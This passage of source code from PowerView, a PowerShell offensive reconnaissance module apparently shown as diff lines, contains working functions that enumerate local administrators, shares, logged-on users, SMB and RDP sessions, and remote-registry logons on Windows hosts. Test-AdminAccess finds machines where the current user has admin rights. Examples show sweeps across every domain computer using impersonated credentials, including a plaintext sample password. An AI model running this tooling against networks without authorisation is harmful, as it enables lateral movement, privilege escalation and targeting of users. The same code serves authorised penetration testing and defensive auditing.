+ +.LINK + +http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together +http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx +https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.LocalGroupMember.API')] + [OutputType('PowerView.LocalGroupMember.WinNT')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = $Env:COMPUTERNAME, + + [Parameter(ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [String] + $GroupName = 'Administrators', + + [ValidateSet('API', 'WinNT')] + [Alias('CollectionMethod')] + [String] + $Method = 'API', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + if ($Method -eq 'API') { + # if we're using the Netapi32 NetLocalGroupGetMembers API call to get the local group information + + # arguments for NetLocalGroupGetMembers + $QueryLevel = 2 + $PtrInfo = [IntPtr]::Zero + $EntriesRead = 0 + $TotalRead = 0 + $ResumeHandle = 0 + + # get the local user information + $Result = $Netapi32::NetLocalGroupGetMembers($Computer, $GroupName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) + + # locate the offset of the initial intPtr + $Offset = $PtrInfo.ToInt64() + + $Members = @() + + # 0 = success + if (($Result -eq 0) -and ($Offset -gt 0)) { + + # Work out how much to increment the pointer by finding out the size of the structure + $Increment = $LOCALGROUP_MEMBERS_INFO_2::GetSize() + + # 
parse all the result structures + for ($i = 0; ($i -lt $EntriesRead); $i++) { + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $LOCALGROUP_MEMBERS_INFO_2 + + $Offset = $NewIntPtr.ToInt64() + $Offset += $Increment + + $SidString = '' + $Result2 = $Advapi32::ConvertSidToStringSid($Info.lgrmi2_sid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + + if ($Result2 -eq 0) { + Write-Verbose "[Get-NetLocalGroupMember] Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + } + else { + $Member = New-Object PSObject + $Member | Add-Member Noteproperty 'ComputerName' $Computer + $Member | Add-Member Noteproperty 'GroupName' $GroupName + $Member | Add-Member Noteproperty 'MemberName' $Info.lgrmi2_domainandname + $Member | Add-Member Noteproperty 'SID' $SidString + $IsGroup = $($Info.lgrmi2_sidusage -eq 'SidTypeGroup') + $Member | Add-Member Noteproperty 'IsGroup' $IsGroup + $Member.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroupMember.API') + $Members += $Member + } + } + + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + + # try to extract out the machine SID by using the -500 account as a reference + $MachineSid = $Members | Where-Object {$_.SID -match '.*-500' -or ($_.SID -match '.*-501')} | Select-Object -Expand SID + if ($MachineSid) { + $MachineSid = $MachineSid.Substring(0, $MachineSid.LastIndexOf('-')) + + $Members | ForEach-Object { + if ($_.SID -match $MachineSid) { + $_ | Add-Member Noteproperty 'IsDomain' $False + } + else { + $_ | Add-Member Noteproperty 'IsDomain' $True + } + } + } + else { + $Members | ForEach-Object { + if ($_.SID -notmatch 'S-1-5-21') { + $_ | Add-Member Noteproperty 'IsDomain' $False + } + else { + $_ | Add-Member Noteproperty 'IsDomain' 'UNKNOWN' + } + } + } + $Members + } + else { + Write-Verbose "[Get-NetLocalGroupMember] Error: 
$(([ComponentModel.Win32Exception] $Result).Message)" + } + } + else { + # otherwise we're using the WinNT service provider + try { + $GroupProvider = [ADSI]"WinNT://$Computer/$GroupName,group" + + $GroupProvider.psbase.Invoke('Members') | ForEach-Object { + + $Member = New-Object PSObject + $Member | Add-Member Noteproperty 'ComputerName' $Computer + $Member | Add-Member Noteproperty 'GroupName' $GroupName + + $LocalUser = ([ADSI]$_) + $AdsPath = $LocalUser.InvokeGet('AdsPath').Replace('WinNT://', '') + $IsGroup = ($LocalUser.SchemaClassName -like 'group') + + if(([regex]::Matches($AdsPath, '/')).count -eq 1) { + # DOMAIN\user + $MemberIsDomain = $True + $Name = $AdsPath.Replace('/', '\') + } + else { + # DOMAIN\machine\user + $MemberIsDomain = $False + $Name = $AdsPath.Substring($AdsPath.IndexOf('/')+1).Replace('/', '\') + } + + $Member | Add-Member Noteproperty 'AccountName' $Name + $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value) + $Member | Add-Member Noteproperty 'IsGroup' $IsGroup + $Member | Add-Member Noteproperty 'IsDomain' $MemberIsDomain + + # if ($MemberIsDomain) { + # # translate the binary sid to a string + # $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value) + # $Member | Add-Member Noteproperty 'Description' '' + # $Member | Add-Member Noteproperty 'Disabled' '' + + # if ($IsGroup) { + # $Member | Add-Member Noteproperty 'LastLogin' '' + # } + # else { + # try { + # $Member | Add-Member Noteproperty 'LastLogin' $LocalUser.InvokeGet('LastLogin') + # } + # catch { + # $Member | Add-Member Noteproperty 'LastLogin' '' + # } + # } + # $Member | Add-Member Noteproperty 'PwdLastSet' '' + # $Member | Add-Member Noteproperty 'PwdExpired' '' + # $Member | Add-Member Noteproperty 'UserFlags' '' + # } + # else { + # # translate the binary sid to a string + # $Member | 
Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value) + # $Member | Add-Member Noteproperty 'Description' ($LocalUser.Description) + + # if ($IsGroup) { + # $Member | Add-Member Noteproperty 'PwdLastSet' '' + # $Member | Add-Member Noteproperty 'PwdExpired' '' + # $Member | Add-Member Noteproperty 'UserFlags' '' + # $Member | Add-Member Noteproperty 'Disabled' '' + # $Member | Add-Member Noteproperty 'LastLogin' '' + # } + # else { + # $Member | Add-Member Noteproperty 'PwdLastSet' ( (Get-Date).AddSeconds(-$LocalUser.PasswordAge[0])) + # $Member | Add-Member Noteproperty 'PwdExpired' ( $LocalUser.PasswordExpired[0] -eq '1') + # $Member | Add-Member Noteproperty 'UserFlags' ( $LocalUser.UserFlags[0] ) + # # UAC flags of 0x2 mean the account is disabled + # $Member | Add-Member Noteproperty 'Disabled' $(($LocalUser.UserFlags.value -band 2) -eq 2) + # try { + # $Member | Add-Member Noteproperty 'LastLogin' ( $LocalUser.LastLogin[0]) + # } + # catch { + # $Member | Add-Member Noteproperty 'LastLogin' '' + # } + # } + # } + + $Member + } + } + catch { + Write-Verbose "[Get-NetLocalGroupMember] Error for $Computer : $_" + } + } + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Get-NetShare { +<# +.SYNOPSIS + +Returns open shares on the local (or a remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +.DESCRIPTION + +This function will execute the NetShareEnum Win32API call to query +a given host for open shares. This is a replacement for "net share \\hostname". + +.PARAMETER ComputerName + +Specifies the hostname to query for shares (also accepts IP addresses). +Defaults to 'localhost'. 
+ +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +.EXAMPLE + +Get-NetShare + +Returns active shares on the local host. + +.EXAMPLE + +Get-NetShare -ComputerName sqlserver + +Returns active shares on the 'sqlserver' host + +.EXAMPLE + +Get-DomainComputer | Get-NetShare + +Returns all shares for all computers in the domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetShare -ComputerName sqlserver -Credential $Cred + +.OUTPUTS + +PowerView.ShareInfo + +A PSCustomObject representing a SHARE_INFO_1 structure, including +the name/type/remark for each share, with the ComputerName added. + +.LINK + +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ +#> + + [OutputType('PowerView.ShareInfo')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + # arguments for NetShareEnum + $QueryLevel = 1 + $PtrInfo = [IntPtr]::Zero + $EntriesRead = 0 + $TotalRead = 0 + $ResumeHandle = 0 + + # get the raw share information + $Result = $Netapi32::NetShareEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) + + # locate the offset of the initial intPtr + $Offset = $PtrInfo.ToInt64() + + # 0 = success + if 
(($Result -eq 0) -and ($Offset -gt 0)) { + + # work out how much to increment the pointer by finding out the size of the structure + $Increment = $SHARE_INFO_1::GetSize() + + # parse all the result structures + for ($i = 0; ($i -lt $EntriesRead); $i++) { + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $SHARE_INFO_1 + + # return all the sections of the structure - have to do it this way for V2 + $Share = $Info | Select-Object * + $Share | Add-Member Noteproperty 'ComputerName' $Computer + $Share.PSObject.TypeNames.Insert(0, 'PowerView.ShareInfo') + $Offset = $NewIntPtr.ToInt64() + $Offset += $Increment + $Share + } + + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + } + else { + Write-Verbose "[Get-NetShare] Error: $(([ComponentModel.Win32Exception] $Result).Message)" + } + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Get-NetLoggedon { +<# +.SYNOPSIS + +Returns users logged on the local (or a remote) machine. +Note: administrative rights needed for newer Windows OSes. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +.DESCRIPTION + +This function will execute the NetWkstaUserEnum Win32API call to query +a given host for actively logged on users. + +.PARAMETER ComputerName + +Specifies the hostname to query for logged on users (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +.EXAMPLE + +Get-NetLoggedon + +Returns users actively logged onto the local host. + +.EXAMPLE + +Get-NetLoggedon -ComputerName sqlserver + +Returns users actively logged onto the 'sqlserver' host. 
+ +.EXAMPLE + +Get-DomainComputer | Get-NetLoggedon + +Returns all logged on users for all computers in the domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetLoggedon -ComputerName sqlserver -Credential $Cred + +.OUTPUTS + +PowerView.LoggedOnUserInfo + +A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including +the UserName/LogonDomain/AuthDomains/LogonServer for each user, with the ComputerName added. + +.LINK + +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ +#> + + [OutputType('PowerView.LoggedOnUserInfo')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + # declare the reference variables + $QueryLevel = 1 + $PtrInfo = [IntPtr]::Zero + $EntriesRead = 0 + $TotalRead = 0 + $ResumeHandle = 0 + + # get logged on user information + $Result = $Netapi32::NetWkstaUserEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) + + # locate the offset of the initial intPtr + $Offset = $PtrInfo.ToInt64() + + # 0 = success + if (($Result -eq 0) -and ($Offset -gt 0)) { + + # work out how much to increment the pointer by finding out the size of the structure + $Increment = $WKSTA_USER_INFO_1::GetSize() + + # parse all the result structures + for ($i = 0; ($i -lt $EntriesRead); $i++) { + # create a 
new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $WKSTA_USER_INFO_1 + + # return all the sections of the structure - have to do it this way for V2 + $LoggedOn = $Info | Select-Object * + $LoggedOn | Add-Member Noteproperty 'ComputerName' $Computer + $LoggedOn.PSObject.TypeNames.Insert(0, 'PowerView.LoggedOnUserInfo') + $Offset = $NewIntPtr.ToInt64() + $Offset += $Increment + $LoggedOn + } + + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + } + else { + Write-Verbose "[Get-NetLoggedon] Error: $(([ComponentModel.Win32Exception] $Result).Message)" + } + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Get-NetSession { +<# +.SYNOPSIS + +Returns session information for the local (or a remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +.DESCRIPTION + +This function will execute the NetSessionEnum Win32API call to query +a given host for active sessions. + +.PARAMETER ComputerName + +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +.EXAMPLE + +Get-NetSession + +Returns active sessions on the local host. + +.EXAMPLE + +Get-NetSession -ComputerName sqlserver + +Returns active sessions on the 'sqlserver' host. + +.EXAMPLE + +Get-DomainController | Get-NetSession + +Returns active sessions on all domain controllers. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetSession -ComputerName sqlserver -Credential $Cred + +.OUTPUTS + +PowerView.SessionInfo + +A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including +the CName/UserName/Time/IdleTime for each session, with the ComputerName added. + +.LINK + +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ +#> + + [OutputType('PowerView.SessionInfo')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + # arguments for NetSessionEnum + $QueryLevel = 10 + $PtrInfo = [IntPtr]::Zero + $EntriesRead = 0 + $TotalRead = 0 + $ResumeHandle = 0 + + # get session information + $Result = $Netapi32::NetSessionEnum($Computer, '', $UserName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) + + # locate the offset of the initial intPtr + $Offset = $PtrInfo.ToInt64() + + # 0 = success + if (($Result -eq 0) -and ($Offset -gt 0)) { + + # work out how much to increment the pointer by finding out the size of the structure + $Increment = $SESSION_INFO_10::GetSize() + + # parse all the result structures + for ($i = 0; ($i -lt $EntriesRead); $i++) { + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $SESSION_INFO_10 + + # return all the 
sections of the structure - have to do it this way for V2 + $Session = $Info | Select-Object * + $Session | Add-Member Noteproperty 'ComputerName' $Computer + $Session.PSObject.TypeNames.Insert(0, 'PowerView.SessionInfo') + $Offset = $NewIntPtr.ToInt64() + $Offset += $Increment + $Session + } + + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + } + else { + Write-Verbose "[Get-NetSession] Error: $(([ComponentModel.Win32Exception] $Result).Message)" + } + } + } + + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Get-RegLoggedOn { +<# +.SYNOPSIS + +Returns who is logged onto the local (or a remote) machine +through enumeration of remote registry keys. + +Note: This function requires only domain user rights on the +machine you're enumerating, but remote registry must be enabled. + +Author: Matt Kelly (@BreakersAll) +License: BSD 3-Clause +Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID + +.DESCRIPTION + +This function will query the HKU registry values to retrieve the local +logged on users SID and then attempt and reverse it. +Adapted technique from Sysinternal's PSLoggedOn script. Benefit over +using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges +required (NetWkstaUserEnum requires remote admin access). + +.PARAMETER ComputerName + +Specifies the hostname to query for remote registry values (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +.EXAMPLE + +Get-RegLoggedOn + +Returns users actively logged onto the local host. + +.EXAMPLE + +Get-RegLoggedOn -ComputerName sqlserver + +Returns users actively logged onto the 'sqlserver' host. + +.EXAMPLE + +Get-DomainController | Get-RegLoggedOn + +Returns users actively logged on all domain controllers. 
+ +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-RegLoggedOn -ComputerName sqlserver -Credential $Cred + +.OUTPUTS + +PowerView.RegLoggedOnUser + +A PSCustomObject including the UserDomain/UserName/UserSID of each +actively logged on user, with the ComputerName added. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.RegLoggedOnUser')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost' + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + try { + # retrieve HKU remote registry values + $Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('Users', "$ComputerName") + + # sort out bogus sid's like _class + $Reg.GetSubKeyNames() | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } | ForEach-Object { + $UserName = ConvertFrom-SID -ObjectSID $_ -OutputType 'DomainSimple' + + if ($UserName) { + $UserName, $UserDomain = $UserName.Split('@') + } + else { + $UserName = $_ + $UserDomain = $Null + } + + $RegLoggedOnUser = New-Object PSObject + $RegLoggedOnUser | Add-Member Noteproperty 'ComputerName' "$ComputerName" + $RegLoggedOnUser | Add-Member Noteproperty 'UserDomain' $UserDomain + $RegLoggedOnUser | Add-Member Noteproperty 'UserName' $UserName + $RegLoggedOnUser | Add-Member Noteproperty 'UserSID' $_ + $RegLoggedOnUser.PSObject.TypeNames.Insert(0, 'PowerView.RegLoggedOnUser') + $RegLoggedOnUser + } + } + catch { + Write-Verbose "[Get-RegLoggedOn] Error opening remote registry on '$ComputerName' : $_" + } + } + } + + END { + if ($LogonToken) { 
+ Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Get-NetRDPSession { +<# +.SYNOPSIS + +Returns remote desktop/session information for the local (or a remote) machine. + +Note: only members of the Administrators or Account Operators local group +can successfully execute this functionality on a remote target. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +.DESCRIPTION + +This function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation +Win32API calls to query a given RDP remote service for active sessions and originating +IPs. This is a replacement for qwinsta. + +.PARAMETER ComputerName + +Specifies the hostname to query for active sessions (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +.EXAMPLE + +Get-NetRDPSession + +Returns active RDP/terminal sessions on the local host. + +.EXAMPLE + +Get-NetRDPSession -ComputerName "sqlserver" + +Returns active RDP/terminal sessions on the 'sqlserver' host. + +.EXAMPLE + +Get-DomainController | Get-NetRDPSession + +Returns active RDP/terminal sessions on all domain controllers. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetRDPSession -ComputerName sqlserver -Credential $Cred + +.OUTPUTS + +PowerView.RDPSessionInfo + +A PSCustomObject representing a combined WTS_SESSION_INFO_1 and WTS_CLIENT_ADDRESS structure, +with the ComputerName added. 
+ +.LINK + +https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx +#> + + [OutputType('PowerView.RDPSessionInfo')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + + # open up a handle to the Remote Desktop Session host + $Handle = $Wtsapi32::WTSOpenServerEx($Computer) + + # if we get a non-zero handle back, everything was successful + if ($Handle -ne 0) { + + # arguments for WTSEnumerateSessionsEx + $ppSessionInfo = [IntPtr]::Zero + $pCount = 0 + + # get information on all current sessions + $Result = $Wtsapi32::WTSEnumerateSessionsEx($Handle, [ref]1, 0, [ref]$ppSessionInfo, [ref]$pCount);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + + # locate the offset of the initial intPtr + $Offset = $ppSessionInfo.ToInt64() + + if (($Result -ne 0) -and ($Offset -gt 0)) { + + # work out how much to increment the pointer by finding out the size of the structure + $Increment = $WTS_SESSION_INFO_1::GetSize() + + # parse all the result structures + for ($i = 0; ($i -lt $pCount); $i++) { + + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $WTS_SESSION_INFO_1 + + $RDPSession = New-Object PSObject + + if ($Info.pHostName) { + $RDPSession | Add-Member Noteproperty 'ComputerName' $Info.pHostName + } + else { + # if no hostname returned, use the specified hostname + $RDPSession | Add-Member Noteproperty 
'ComputerName' $Computer + } + + $RDPSession | Add-Member Noteproperty 'SessionName' $Info.pSessionName + + if ($(-not $Info.pDomainName) -or ($Info.pDomainName -eq '')) { + # if a domain isn't returned just use the username + $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pUserName)" + } + else { + $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pDomainName)\$($Info.pUserName)" + } + + $RDPSession | Add-Member Noteproperty 'ID' $Info.SessionID + $RDPSession | Add-Member Noteproperty 'State' $Info.State + + $ppBuffer = [IntPtr]::Zero + $pBytesReturned = 0 + + # query for the source client IP with WTSQuerySessionInformation + # https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx + $Result2 = $Wtsapi32::WTSQuerySessionInformation($Handle, $Info.SessionID, 14, [ref]$ppBuffer, [ref]$pBytesReturned);$LastError2 = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + + if ($Result2 -eq 0) { + Write-Verbose "[Get-NetRDPSession] Error: $(([ComponentModel.Win32Exception] $LastError2).Message)" + } + else { + $Offset2 = $ppBuffer.ToInt64() + $NewIntPtr2 = New-Object System.Intptr -ArgumentList $Offset2 + $Info2 = $NewIntPtr2 -as $WTS_CLIENT_ADDRESS + + $SourceIP = $Info2.Address + if ($SourceIP[2] -ne 0) { + $SourceIP = [String]$SourceIP[2]+'.'+[String]$SourceIP[3]+'.'+[String]$SourceIP[4]+'.'+[String]$SourceIP[5] + } + else { + $SourceIP = $Null + } + + $RDPSession | Add-Member Noteproperty 'SourceIP' $SourceIP + $RDPSession.PSObject.TypeNames.Insert(0, 'PowerView.RDPSessionInfo') + $RDPSession + + # free up the memory buffer + $Null = $Wtsapi32::WTSFreeMemory($ppBuffer) + + $Offset += $Increment + } + } + # free up the memory result buffer + $Null = $Wtsapi32::WTSFreeMemoryEx(2, $ppSessionInfo, $pCount) + } + else { + Write-Verbose "[Get-NetRDPSession] Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + } + # close off the service handle + $Null = $Wtsapi32::WTSCloseServer($Handle) + } + else { + Write-Verbose 
"[Get-NetRDPSession] Error opening the Remote Desktop Session Host (RD Session Host) server for: $ComputerName" + } + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Test-AdminAccess { +<# +.SYNOPSIS + +Tests if the current user has administrative access to the local (or a remote) machine. + +Idea stolen from the local_admin_search_enum post module in Metasploit written by: + 'Brandon McCann "zeknox" ' + 'Thomas McCarthy "smilingraccoon" ' + 'Royce Davis "r3dy" ' + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +.DESCRIPTION + +This function will use the OpenSCManagerW Win32API call to establish +a handle to the remote host. If this succeeds, the current user context +has local administrator acess to the target. + +.PARAMETER ComputerName + +Specifies the hostname to check for local admin access (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +.EXAMPLE + +Test-AdminAccess -ComputerName sqlserver + +Returns results indicating whether the current user has admin access to the 'sqlserver' host. + +.EXAMPLE + +Get-DomainComputer | Test-AdminAccess + +Returns what machines in the domain the current user has access to. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Test-AdminAccess -ComputerName sqlserver -Credential $Cred + +.OUTPUTS + +PowerView.AdminAccess + +A PSCustomObject containing the ComputerName and 'IsAdmin' set to whether +the current user has local admin rights, along with the ComputerName added. 
+ +.LINK + +https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ +#> + + [OutputType('PowerView.AdminAccess')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + # 0xF003F - SC_MANAGER_ALL_ACCESS + # http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx + $Handle = $Advapi32::OpenSCManagerW("\\$Computer", 'ServicesActive', 0xF003F);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + + $IsAdmin = New-Object PSObject + $IsAdmin | Add-Member Noteproperty 'ComputerName' $Computer + + # if we get a non-zero handle back, everything was successful + if ($Handle -ne 0) { + $Null = $Advapi32::CloseServiceHandle($Handle) + $IsAdmin | Add-Member Noteproperty 'IsAdmin' $True + } + else { + Write-Verbose "[Test-AdminAccess] Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + $IsAdmin | Add-Member Noteproperty 'IsAdmin' $False + } + $IsAdmin.PSObject.TypeNames.Insert(0, 'PowerView.AdminAccess') + $IsAdmin + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Get-NetComputerSiteName { +<# +.SYNOPSIS + +Returns the AD site where the local (or a remote) machine resides. 
